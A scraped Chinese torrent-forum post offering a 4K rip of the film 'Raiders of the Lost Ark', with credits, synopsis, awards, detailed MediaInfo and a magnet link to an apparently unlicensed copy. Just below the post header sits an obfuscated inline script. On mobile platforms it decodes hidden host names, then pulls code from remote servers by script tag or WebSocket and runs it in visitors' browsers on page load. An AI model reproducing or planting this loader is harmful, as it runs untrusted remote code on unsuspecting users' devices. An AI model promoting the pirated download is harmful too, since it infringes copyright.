夺宝奇兵[国英多音轨/简繁字幕].Raiders.Of.The.Lost.Ark.1981.UHD.BluRay.2160p.2Audio.TrueHD.Atmos.7.1.x265.10bit.HDR 25.36GB

版主小s 1月前 283

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 夺宝奇兵 / 法柜奇兵 / 夺宝奇兵:法柜奇兵 / 印地安纳?琼斯之夺宝奇兵 / Indiana Jones and the Raiders of the Lost Ark
◎片  名 Raiders of the Lost Ark
◎年  代 1981
◎产  地 美国 / 英国
◎类  别 动作 / 冒险
◎语  言 英语 / 德语 / 希伯来语 / 西班牙语 / 阿拉伯语 / 尼泊尔语
◎上映日期 1981-06-12(美国)
◎IMDb链接 https://www.imdb.com/title/tt0082971/
◎豆瓣评分 7.9/10 (78401人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296717/
◎片  长 115 分钟
◎导  演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)
◎编  剧 劳伦斯·卡斯丹 Lawrence Kasdan (id:1014071)
       乔治·卢卡斯 George Lucas (id:1054507)
       菲利普·考夫曼 Philip Kaufman (id:1027416)
◎演  员 哈里森·福特 Harrison Ford (id:1009238)
       凯伦·阿兰 Karen Allen (id:1027207)
       保罗·弗里曼 Paul Freeman (id:1014092)
       约翰·瑞斯-戴维斯 John Rhys-Davies (id:1147054)
       基兰·沙阿 Kiran Shah (id:1027425)
       弗兰克·马歇尔 Frank Marshall (id:1049939)
       乔治·哈里斯 George Harris (id:1101481)
       阿尔弗雷德·莫里纳 Alfred Molina (id:1017897)
       帕特·罗奇 Pat Roach (id:1045132)
       安东尼·希金斯 Anthony Higgins (id:1045213)
       罗纳德·莱西 Ronald Lacey (id:1111486)
       丹霍姆·艾略特 Denholm Elliott (id:1019108)
       特里·伦纳德 Terry Leonard (id:1289809)
       Nick Gillard Nick Gillard (id:1276467)
       乔治·卢卡斯 George Lucas (id:1054507)
       罗伯特·沃茨 Robert Watts (id:1300525)
       霍华德·G·卡赞强 Howard G. Kazanjian (id:1288271)
       约翰·威廉姆斯 John Williams (id:1054692)
       乔治·卢卡斯 George Lucas (id:1054507)
       迈克·芬顿 Mike Fenton (id:1283570)
       诺曼·雷诺兹 Norman Reynolds (id:1295528)
       迈克尔·福特 Michael Ford (id:1283972)
       莱斯利·迪利 Leslie Dilley (id:1282443)
       戴博拉·纳杜尔曼 Deborah Nadoolman (id:1292863)
       克里斯·瓦拉斯 Chris Walas (id:1300275)
       Mike Lockey Mike Lockey (id:1290223)
       Sylvia Keulen Sylvia Keulen (id:1288467)
       尼尔·克雷佩拉 Neil Krepela (id:1289019)
       Michael Pangrazio Michael Pangrazio (id:1293881)
       John McLeod John McLeod (id:1291681)
       塞恩·莫里斯 Thaine Morris (id:1292551)
       洛尔恩·彼得森 Lorne Peterson (id:1294386)
       Nilo Rodis-Jamero Nilo Rodis-Jamero (id:1295855)
       托马斯·罗塞特 Thomas Rosseter (id:1296146)
       肯尼斯·史密斯 Kenneth Smith (id:1297900)
       Thomas G. Smith Thomas G. Smith (id:1297955)
       约翰·T·范弗利特 John T. Van Vliet (id:1299892)
       加里·沃勒 Garry Waller (id:1300338)
       约翰·埃利斯 John Ellis (id:1305506)
       埃德·琼斯 Ed Jones (id:1287861)
       保罗·哈特森 Paul Huston (id:1287204)
       贝丝·达马托 Beth D'Amato (id:1281675)
       布鲁斯·尼科尔森 Bruce Nicholson (id:1293146)
       Charles Bailey Charles Bailey (id:1277693)
       克莱格·巴朗 Craig Barron (id:1277981)
       康拉德·巴夫四世 Conrad Buff IV (id:1279581)
       Laura Buff Laura Buff (id:1279586)
       爱德华·赫希 Edward Hirsh (id:1286690)
       史蒂夫·高利 Steve Gawley (id:1284643)

◎标  签 冒险 / 斯皮尔伯格 / 美国 / 动作 / 探险 / 经典 / 美国电影 / 1981

◎简  介
  二战期间,希特勒在世界各地召集考古学家寻找“失落的约柜”——圣经中引导希伯来人与上帝交流的圣物,希特勒欲借其来护佑纳粹的战争。                                    
                                为了使希特勒的计划破灭,印第安纳琼斯博士(Harrison Ford饰)奔赴尼泊尔,一边奋力挖掘蛛丝马迹,一边还要与无孔不入的纳粹分子周旋。凭借着过人的智慧和异于常人的胆量及大无畏的勇气,琼斯终于在罗马找到了指示约柜位置的太阳手杖,继而发现了约柜。                                    
                                就在大功告成之际,纳粹军却侵吞了胜利果实,还将琼斯等人留在了蛇穴里!但是无往不胜的琼斯总是有办法死里逃生,并狠狠地还以颜色!

◎获奖情况 (共9项)
  第54届奥斯卡金像奖 (1982)
  最佳影片(提名)
   └──弗兰克·马歇尔 (id:1049939)
  最佳导演(提名)
   └──史蒂文·斯皮尔伯格 (id:1054440)
  最佳摄影(提名)
   └──道格拉斯·斯洛科姆 (id:1007237)
  最佳剪辑
   └──迈克尔·卡恩 (id:1037019)
  最佳视觉效果
  最佳音响
  最佳艺术指导
  最佳原创配乐(提名)
   └──约翰·威廉姆斯 (id:1054692)
  特别成就奖

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 224275248234044249917479725281205847031 (0xA8B9D77572FF0F9A0507AFC5DEE083F7)

  4. Complete name                            : Raiders.Of.The.Lost.Ark.198[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 25.4 GiB

  8. Duration                                 : 1 h 55 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 31.5 Mb/s

  11. Encoded date                             : UTC 2021-08-03 03:33:59

  12. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. HDR format                               : SMPTE ST 2086, HDR10 compatible

  20. Codec ID                                 : V_MPEGH/ISO/HEVC

  21. Duration                                 : 1 h 55 min

  22. Bit rate                                 : 21.1 Mb/s

  23. Width                                    : 3 840 pixels

  24. Height                                   : 1 634 pixels

  25. Display aspect ratio                     : 2.35:1

  26. Frame rate mode                          : Constant

  27. Frame rate                               : 23.976 (24000/1001/53354) FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0 (Type 2)

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.140

  32. Stream size                              : 17.0 GiB (67%)

  33. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 21059 kbps

  34. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1634 / interlace=0 / total-frames=165868 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=1000,551 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language                                 : English

  37. Default                                  : Yes

  38. Forced                                   : No

  39. Color range                              : Limited

  40. Color primaries                          : BT.2020

  41. Transfer characteristics                 : PQ

  42. Matrix coefficients                      : BT.2020 non-constant

  43. Mastering display color primaries        : Display P3

  44. Mastering display luminance              : min: 0.0050 cd/m2, max: 4000 cd/m2

  45. Maximum Content Light Level              : 1000 cd/m2

  46. Maximum Frame-Average Light Level        : 551 cd/m2


  47. Audio #1

  48. ID                                       : 2

  49. Format                                   : MLP FBA 16-ch

  50. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name                          : Dolby TrueHD with Dolby Atmos

  52. Codec ID                                 : A_TRUEHD

  53. Duration                                 : 1 h 55 min

  54. Bit rate mode                            : Variable

  55. Bit rate                                 : 3 761 kb/s

  56. Maximum bit rate                         : 5 607 kb/s

  57. Channel(s)                               : 8 channels

  58. Channel layout                           : L R C LFE Ls Rs Lb Rb

  59. Sampling rate                            : 48.0 kHz

  60. Frame rate                               : 1 200.000 FPS (40 SPF)

  61. Compression mode                         : Lossless

  62. Stream size                              : 3.03 GiB (12%)

  63. Title                                    : English Dolby TrueHD 7.1 (Atmos) @ 4401 kbps

  64. Language                                 : English

  65. Default                                  : Yes

  66. Forced                                   : No

  67. Number of dynamic objects                : 11

  68. Bed channel count                        : 1 channel

  69. Bed channel configuration                : LFE


  70. Audio #2

  71. ID                                       : 3

  72. Format                                   : AC-3

  73. Format/Info                              : Audio Coding 3

  74. Commercial name                          : Dolby Digital

  75. Codec ID                                 : A_AC3

  76. Duration                                 : 1 h 55 min

  77. Bit rate mode                            : Constant

  78. Bit rate                                 : 640 kb/s

  79. Channel(s)                               : 6 channels

  80. Channel layout                           : L R C LFE Ls Rs

  81. Sampling rate                            : 48.0 kHz

  82. Frame rate                               : 31.250 FPS (1536 SPF)

  83. Compression mode                         : Lossy

  84. Stream size                              : 528 MiB (2%)

  85. Title                                    : English Dolby Digital Audio 5.1 @ 640 kbps

  86. Language                                 : English

  87. Service kind                             : Complete Main

  88. Default                                  : No

  89. Forced                                   : No


  90. Audio #3

  91. ID                                       : 4

  92. Format                                   : DTS

  93. Format/Info                              : Digital Theater Systems

  94. Codec ID                                 : A_DTS

  95. Duration                                 : 1 h 55 min

  96. Bit rate mode                            : Constant

  97. Bit rate                                 : 754 kb/s

  98. Channel(s)                               : 6 channels

  99. Channel layout                           : C L R Ls Rs LFE

  100. Sampling rate                            : 48.0 kHz

  101. Frame rate                               : 93.750 FPS (512 SPF)

  102. Bit depth                                : 24 bits

  103. Compression mode                         : Lossy

  104. Stream size                              : 622 MiB (2%)

  105. Title                                    : Mandarin DTS 5.1 @ 768 kbps (驴脾气混音)

  106. Language                                 : Chinese

  107. Default                                  : No

  108. Forced                                   : No


  109. Audio #4

  110. ID                                       : 5

  111. Format                                   : DTS XLL

  112. Format/Info                              : Digital Theater Systems

  113. Commercial name                          : DTS-HD Master Audio

  114. Codec ID                                 : A_DTS

  115. Duration                                 : 1 h 55 min

  116. Bit rate mode                            : Variable

  117. Bit rate                                 : 5 057 kb/s

  118. Channel(s)                               : 8 channels

  119. Channel layout                           : C L R LFE Lb Rb Lss Rss

  120. Sampling rate                            : 48.0 kHz

  121. Frame rate                               : 93.750 FPS (512 SPF)

  122. Bit depth                                : 24 bits

  123. Compression mode                         : Lossless

  124. Stream size                              : 4.07 GiB (16%)

  125. Title                                    : DTS-HD Master Audio 7.1 @ 4623 kbps (重编码)

  126. Language                                 : Chinese

  127. Default                                  : No

  128. Forced                                   : No


  129. Text #1

  130. ID                                       : 6

  131. Format                                   : PGS

  132. Codec ID                                 : S_HDMV/PGS

  133. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration                                 : 1 h 48 min

  135. Bit rate                                 : 22.0 kb/s

  136. Count of elements                        : 2014

  137. Stream size                              : 17.0 MiB (0%)

  138. Title                                    : Eng/SUP

  139. Language                                 : English

  140. Default                                  : No

  141. Forced                                   : No


  142. Text #2

  143. ID                                       : 7

  144. Format                                   : PGS

  145. Codec ID                                 : S_HDMV/PGS

  146. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  147. Duration                                 : 1 h 49 min

  148. Bit rate                                 : 26.1 kb/s

  149. Count of elements                        : 2450

  150. Stream size                              : 20.5 MiB (0%)

  151. Title                                    : Eng/SUP  SDH

  152. Language                                 : English

  153. Default                                  : No

  154. Forced                                   : No


  155. Text #3

  156. ID                                       : 8

  157. Format                                   : PGS

  158. Codec ID                                 : S_HDMV/PGS

  159. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  160. Duration                                 : 1 h 54 min

  161. Bit rate                                 : 16.2 kb/s

  162. Count of elements                        : 1690

  163. Stream size                              : 13.3 MiB (0%)

  164. Title                                    : Chs/SUP  原盘简体

  165. Language                                 : Chinese

  166. Default                                  : Yes

  167. Forced                                   : No


  168. Text #4

  169. ID                                       : 9

  170. Format                                   : PGS

  171. Codec ID                                 : S_HDMV/PGS

  172. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  173. Duration                                 : 1 h 52 min

  174. Bit rate                                 : 12.3 kb/s

  175. Count of elements                        : 1184

  176. Stream size                              : 9.96 MiB (0%)

  177. Title                                    : Cht/SUP  原盘繁体(HK)

  178. Language                                 : Chinese

  179. Default                                  : No

  180. Forced                                   : No


  181. Text #5

  182. ID                                       : 10

  183. Format                                   : PGS

  184. Codec ID                                 : S_HDMV/PGS

  185. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  186. Duration                                 : 1 h 54 min

  187. Bit rate                                 : 13.5 kb/s

  188. Count of elements                        : 1558

  189. Stream size                              : 11.1 MiB (0%)

  190. Title                                    : Cht/SUP  原盘繁体(TW)

  191. Language                                 : Chinese

  192. Default                                  : No

  193. Forced                                   : No


  194. Text #6

  195. ID                                       : 11

  196. Format                                   : PGS

  197. Codec ID                                 : S_HDMV/PGS

  198. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  199. Duration                                 : 1 h 51 min

  200. Bit rate                                 : 28.2 kb/s

  201. Count of elements                        : 1988

  202. Stream size                              : 22.5 MiB (0%)

  203. Title                                    : Chs/SUP  简英双语

  204. Language                                 : Chinese

  205. Default                                  : No

  206. Forced                                   : No


  207. Text #7

  208. ID                                       : 12

  209. Format                                   : PGS

  210. Codec ID                                 : S_HDMV/PGS

  211. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  212. Duration                                 : 1 h 51 min

  213. Bit rate                                 : 29.0 kb/s

  214. Count of elements                        : 1988

  215. Stream size                              : 23.1 MiB (0%)

  216. Title                                    : Cht/SUP  繁英双语

  217. Language                                 : Chinese

  218. Default                                  : No

  219. Forced                                   : No


  220. Menu

  221. 00:00:00.000                             : en:第 01 章

  222. 00:03:16.530                             : en:第 02 章

  223. 00:05:44.636                             : en:第 03 章

  224. 00:09:51.132                             : en:第 04 章

  225. 00:12:49.352                             : en:第 05 章

  226. 00:15:23.631                             : en:第 06 章

  227. 00:20:27.268                             : en:第 07 章

  228. 00:22:57.835                             : en:第 08 章

  229. 00:28:51.355                             : en:第 09 章

  230. 00:33:42.395                             : en:第 10 章

  231. 00:36:23.390                             : en:第 11 章

  232. 00:40:04.819                             : en:第 12 章

  233. 00:42:16.242                             : en:第 13 章

  234. 00:46:41.549                             : en:第 14 章

  235. 00:49:32.928                             : en:第 15 章

  236. 00:51:00.933                             : en:第 16 章

  237. 00:55:11.141                             : en:第 17 章

  238. 00:58:33.218                             : en:第 18 章

  239. 01:03:05.740                             : en:第 19 章

  240. 01:08:26.144                             : en:第 20 章

  241. 01:10:25.346                             : en:第 21 章

  242. 01:15:33.154                             : en:第 22 章

  243. 01:22:24.356                             : en:第 23 章

  244. 01:25:43.764                             : en:第 24 章

  245. 01:29:57.517                             : en:第 25 章

  246. 01:34:30.790                             : en:第 26 章

  247. 01:38:06.172                             : en:第 27 章

  248. 01:41:06.060                             : en:第 28 章

  249. 01:44:06.866                             : en:第 29 章

  250. 01:47:01.415                             : en:第 30 章

  251. 01:49:05.998                             : en:第 31 章



TAGS 动作 冒险

磁力链:
  • magnet:?xt=urn:btih:5E87EB6C5047BAFB9650A30C531B8FF87DBA19FF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回